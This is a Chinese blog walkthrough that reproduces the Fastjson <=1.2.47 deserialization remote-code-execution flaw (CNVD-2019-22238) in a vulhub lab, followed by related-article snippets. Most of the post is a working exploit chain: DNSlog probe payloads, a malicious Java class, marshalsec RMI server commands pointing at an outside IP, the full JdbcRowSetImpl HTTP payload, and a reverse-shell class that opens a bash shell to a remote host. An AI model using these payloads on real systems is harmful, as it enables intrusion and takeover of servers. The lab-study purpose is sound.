Fastjson <=1.2.47反序列化RCE漏洞(CNVD‐2019‐22238)

最新推荐文章于 2024-04-23 10:29:35 发布
最新推荐文章于 2024-04-23 10:29:35 发布
阅读量1.5k 收藏 2
点赞数 2
分类专栏: 漏洞复习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq89115156/article/details/108150407
版权

**Fastjson <=1.2.47反序列化RCE漏洞(CNVD‐2019‐22238) **

**一、漏洞描述 **

Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列 化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其 次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件 开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流 程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也 就是通常所指的“Gadget”),则会造成一些严重的安全问题。并且在Fastjson 1.2.47及以下版本 中,利用其缓存机制可实现对未开启autotype功能的绕过。

二、影响版本

Fastjson1.2.47以及之前的所有版本

三、环境搭建

vulhub靶场,进入fastjson漏洞环境目录下,执行

cd 1.2.47‐rce/ docker‐compose up ‐d

四、漏洞检测

https://pan.baidu.com/s/196DJjEmEookxqTUYp8-qkw 
提取码:qwer

手动检测:

{"a":{"@type":"java.net.Inet4Address","val":"dnslog"}} {"a":{"@type":"java.net.Inet6Address","val":"dnslog"}} {"a":{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}} {"a":{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}} {"a":{"@type":"java.net.URL","val":"dnslog"}}

五、漏洞复现

1、编译上传TouchFile.class

这里的TouchFile是要编译好的恶意类,将编译好的TouchFile.class放在tomcat webapps/ROOT 目录下,java源码如下

`import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {“touch”, “/tmp/success”};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}`

2、编译需要使用java环境,安装步骤如下

sudo apt‐get update #更新软件包列表 sudo apt install default‐jre #安装默认jre java ‐version #查看java版本

javac TouchFile.java #编译为TouchFile.class

3、安装docker 拉起tomcat

curl ‐s https://get.docker.com/ | sh curl ‐s https://bootstrap.pypa.io/get‐pip.py | python pip install docker‐compose docker search tomcat #搜索镜像(默认去Docker Hub查找) docker pull tomcat:8.0.52 #指定版本拉取tomcat docker images #拉取成功查看拉取的镜像 docker run ‐‐name ytomcat ‐d ‐p 8081:8080 tomcat:8.0.52 #根据镜像启动一个容器

4、宿主机向Docker容器传送文件

docker cp 本地文件的路径 container_id:<docker容器内的路径> docker cp /root/TouchFile.class 5eff9f38e0c7:/usr/local/tomcat/webapps/ROOT #例子 mkdir TouchFile #创建TouchFile目录 mv TouchFile.class TouchFile #将TouchFile.class剪切到TouchFile目录里

将exp.class上传至你的web服务器,地址为http://yours_ip/exp/TouchFile.class。

我的地址为:http://X.X.X.X/TouchFile/TouchFile.class

5、借助marshalsec项目,快速开启rmi或ldap服务

apt install git #安装git git clone https://github.com/mbechler/marshalsec #下载marshalsec apt install maven #下载maven,使用maven进行编译jar包 cd marshalsec mvn clean package ‐DskipTests

启动一个RMI服务器,监听9988端口,并制定加载远程类TouchFile.class:

cd target java ‐cp marshalsec‐0.0.3‐SNAPSHOT‐all.jar marshalsec.jndi.RMIRefServer "ht tp://8.210.235.249/#TouchFile" 9988

6、发送Payload

POST / HTTP/1.1 Host: your‐ip:8090 Accept‐Encoding: gzip, deflate Accept: */* Accept‐Language: en User‐Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content‐Type: application/json Content‐Length: 160 { "a":{ "@type":"java.lang.Class", "val":"com.sun.rowset.JdbcRowSetImpl" }, "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://8.X.X.X/exp" "autoCommit":true } }

至此漏洞复现成功

六、反弹shell

import java.lang.Runtime; import java.lang.Process; public class TouchFile { static { try { Runtime rt = Runtime.getRuntime(); String[] commands = {"/bin/bash","‐c","bash ‐i >& /dev/tcp/8.21 0.235.249/6666 0>&1"}; Process pc = rt.exec(commands); pc.waitFor(); } catch (Exception e) { // do nothing } } }

和前边同理:编译‐‐>将TouchFile.class上传至web服务器‐‐>启动RMI服务器监听端口‐‐>nc 监听端口‐‐ >burpsuite发送Payload

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rdhxqp7v-1597999377958)(https://oscimg.oschina.net/oscnet/up-77e495124a010c037b49bfc79a096c097bb.png)]

HacKing~
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Fastjson漏洞学习——CNVD-2019-22238复现
记录并分享学习安全的知识点..
05-09 1039
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 一、概述 Fastjson是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。它还可以用于将JSON字符串转换为等效的Java对象,fastjson爆出多个反序列化远程命令执行漏洞,攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。 二、影响版本 Fastjson < 1.2.68 ...
CNVD-2019-22238Fastjson 1.2.47 反序列化漏洞复现
冬的博客
03-16 2139
Fastjson 存在反序列化远程代码执行漏洞,当应用或系统使用 Fastjson 对由用户可控的 JSON 字符串数据进行解析时,将可能导致远程代码执行的危害。
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
小司机的奥拓
04-23 2364
在复现的过程中我也出现了许多的问题,最后发送bp改过的数据包之后,一直无法获取shell,也无法创建文件。后来发现是java和javac的版本问题,一定要保证二者都是1.8的版本!其他fastjson漏洞原理相似,只不过是增加了一下黑白名单的过滤,也存在对应的绕过方法,大家可以CSDN上再搜一搜,有很多相关文章。
cnvd_2019_22238
qq_59350385的博客
07-12 477
Fastjson 是Alibaba的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。相信利用过Fastjson漏洞的XDM都知道,该漏洞利用需要编写Java利用代码,然后在编译为class文件,在通过rmi/ladp等远程加载实现漏洞利用url:Vulfocus 漏洞威胁分析平台 本地需要安装java环境,启动JNDI-Injection-Exploit-1.0-SNAPSHOT-all
Fastjson远程代码执行(CNVD-2019-22238)漏洞复现
慢就是快
12-31 5238
文章目录0x00 漏洞简介0x02 影响版本0x03 漏洞复现0x03 指纹识别0x04 注意事项0x05 漏洞修复 0x00 漏洞简介 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。 0x01 漏洞详情 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象 Fastjson提供了autotype功能,允许用户在反序列化数据
Fastjson1.2.48远程代码执行漏洞CNVD-2019-22238
qq_40646572的博客
05-08 700
fastjson在对 JSON 字符串进行反序列化的时候,会读取 @type 的内容,试图把 JSON 内容反序列化成这个对象,并且会调用这个类的set方法, 利用这个特性,构造一个 JSON 字符串,并且使 用 @type 反序列化一个自己想要使用的攻击类。com.sun.rowset.JdbcRowSetImpl就是一个支持调用rmi功能的类。因此可以使用com.sun.rowset.JdbcRowSetImpl类进行远程调用exp。
fastjson1.2.69反序列化远程代码执行漏洞介绍.docx
07-01
**Fastjson 1.2.69 反序列化远程代码执行漏洞详解** Fastjson 是阿里巴巴开源的一个高性能的 JSON 库,广泛应用于 Java 开发中,用于 JSON 的序列化和反序列化操作。然而,Fastjson 1.2.69 版本存在一个严重的反序...
fastjson1.2.8 反序列化远程代码执行漏洞
05-08
astjson采用黑白名单的方法来防御反序列化漏洞,导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令执行漏洞。经研究,该漏洞利用门槛较低,可绕过...
SpringBoot Redis配置Fastjson进行序列化和反序列化实现
10-16
本篇将详细介绍如何在Spring Boot中配置Fastjson进行序列化和反序列化,以实现与Redis的高效交互。 Fastjson是阿里巴巴开发的一款高性能的JSON处理库,它提供了快速的序列化和反序列化能力,支持多种Java类型,包括...
fastjson1.2.24反序列化RCE
最新发布
06-24
然而,像许多处理序列化和反序列化的库一样,Fastjson在某些版本中存在安全风险,其中之一便是“Fastjson 1.2.24反序列化RCE漏洞。这个漏洞允许攻击者通过精心构造的JSON输入,在目标系统上执行任意代码,从而可能...
springmvc fastjson 反序列化时间格式化方法(推荐)
10-20
在Spring MVC中,Fastjson是一个常用的JSON库,用于序列化和反序列化Java对象。当我们在处理日期时间字段时,可能会遇到反序列化时日期格式不一致的问题,导致默认显示为时间戳。本文将详细介绍两种解决Spring MVC中...
fastjson反序列化漏洞_fastjson 反序列化远程代码执行漏洞 紧急通告
weixin_39862484的博客
11-30 418
点击蓝字关注我们漏洞信息漏洞名称:fastjson 反序列化远程代码执行漏洞发布日期:2020.06.03威胁类型:远程代码执行危险等级:高危受影响的版本:fastjson <=1.2.68fastjson sec 版本 <= sec9android 版本不受此漏洞影响漏洞描述fastjson 采用黑白名单的方法来防御反序列化漏洞,导致当攻击者不断发掘新的反序列化 Ga...
Fastjson=1.2.47-RCE反序列化漏洞CNVD201922238)保姆级教程
精品博客,你值得一看~
08-10 531
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其 次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件 开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流 程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也 就是通常所指的“Gadget”),则会造成一些严重的安全问题。
vulfocus/fastjson-cnvd_2019_22238漏洞复现(docker)附问题解决方案
weixin_63139305的博客
03-10 1788
完整的复现过程,每一步的原理都很详细。使用vulhub的docker,没有使用在线的vulfocus因为连接太不稳定了
fastjson CNVD-2019-22238 远程代码执行漏洞
读书 买花 长大
05-19 465
CNVD-2019-22238
CNVD-2019-22238 Fastjson 1.2.47 反序列化复现
weixin_45260839的博客
08-12 739
CNVD-2019-22238 Fastjson 1.2.47 反序列化复现
Fastjson远程代码执行漏洞(CNVD-2019-22238) 漏洞复现
Boom!脑洞大爆炸的博客
07-07 781
Fastjson远程代码执行漏洞(CNVD-2019-22238) 漏洞复现
Fastjson v 1.2.47反序列化漏洞
告白的博客
02-18 1792
fastjson是常用于解析java中的数据,将对象解析为json格式,被广泛应用于各大java项目中,首先爆出1.2.24反序列化rce,后增加了反序列化白名单的机制,不久在1.2.47版本中又被发现反序列化rce,可通过构造恶意的json反序列化rce
fastjson 1.2.74版本发布,fastjson反序列化漏洞升级
bufegar0的博客
10-14 6695
更新说明 fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。 但在安全方面fastjson总是被曝出存在反序列化安全漏洞,会造成会服务器的攻击,风险极大。 影响版本 fastjson <=1.2.68 fastjson sec版本 <= sec9 android版本不受此漏洞影响 解决办法 升级至最新版本1.2.74 1.2.74更新说明 Issues 修复序列化时B
fastjson <= 1.2.80 反序列化任意代码执行漏洞
09-02
fastjson <= 1.2.80 存在反序列化任意代码执行漏洞。该漏洞利用黑白名单防御机制的绕过,即使autoType关闭也可能导致远程命令执行漏洞。这个漏洞的利用门槛较低,可以绕过默认限制攻击远程服务器,风险影响较大。建议fastjson用户立即采取安全措施来保护系统安全。对受影响的特定依赖≤1.2.80的情况下会有影响。为了解决这个问题,可以采取以下几种安全措施: 1. 升级到最新版本1.2.83,该版本修复了此次发现的漏洞。注意,该版本中涉及autotype行为变更,可能在某些场景下存在不兼容情况。如果遇到问题,可以到fastjson的Github页面寻求帮助。 2. 在1.2.68及之后的版本中引入了safeMode,可以通过配置safeMode来关闭autoType功能。这样无论是白名单还是黑名单,都不支持autoType,可以防止反序列化Gadgets类的变种攻击。但是请注意,在关闭autoType之前要充分评估对业务的影响。具体的配置方法可以参考fastjson的Wiki页面。 3. 考虑升级到fastjson v2版本,可以参考fastjson的Github页面了解相关信息。 总结起来,为了解决fastjson <= 1.2.80 反序列化任意代码执行漏洞,建议采取上述的安全措施,包括升级到最新版本、配置safeMode关闭autoType功能或者考虑升级到fastjson v2版本。这样可以防止漏洞的利用,并提升系统的安全性。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [fastjson1.2.8 反序列化远程代码执行漏洞](https://download.csdn.net/download/xiazai_ceshi/18466350)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [fastjson = 1.2.80 反序列化任意代码执行漏洞](https://blog.csdn.net/qq_18209847/article/details/124952791)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值